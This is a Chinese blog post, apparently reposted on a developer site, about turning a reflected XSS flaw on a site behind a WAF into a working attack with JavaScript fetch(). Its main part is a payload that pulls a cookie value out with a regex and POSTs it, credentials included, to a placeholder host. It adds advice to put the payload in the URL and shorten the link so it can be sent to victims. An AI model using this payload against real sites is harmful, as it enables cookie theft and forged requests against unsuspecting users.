内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,
偶然间发现某站有个漏洞
因为有WAF不好利用,我之前是不知道能咋利用,
然后大佬说能XSS利用,叫我写个fetch利用,
我?????
试着去学fetch这个东西了
于是有了此文
正文
首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545
大致理解了
然后发出一个fetch的post请求
也就是这个样子
fetch("http://192.168.199.141:3000/api/user/",{ method:'POST', headers:{ 'Content-Type': 'application/json' }, body:JSON.stringify({ name:'john', pass:'xioayuan' }) }) .then((response)=>response.json()) .then((responseJsonData)=>{ alert("请求成功"); console.log(responseJsonData); }) .catch((error)=>{ alert(error); })
如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点
假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如
document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')
这样就能提取到key的值了
上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS
var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1'); fetch('https://api.xxxx.com/add', { method: "POST", mode: "cors", credentials: 'include', headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: form });
直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。
这样一个反射XSS的利用还是蛮有意思的。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- LWN:利用debounce buffer来阻止恶意设备利用DMA窃取信息
- 新医药 Leon Nanodrugs完成1850万欧元A轮融资,利用粒子合成方法提高药物利用率
- JNDI 注入利用工具
- Outlook滥用利用链
- tcache机制利用总结
- LFItoRCE利用总结
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Transcending CSS
Andy Clarke、Molly E. Holzschlag / New Riders / November 15, 2006 / $49.99
As the Web evolves to incorporate new standards and the latest browsers offer new possibilities for creative design, the art of creating Web sites is also changing. Few Web designers are experienced p......一起来看看 《Transcending CSS》 这本书的介绍吧!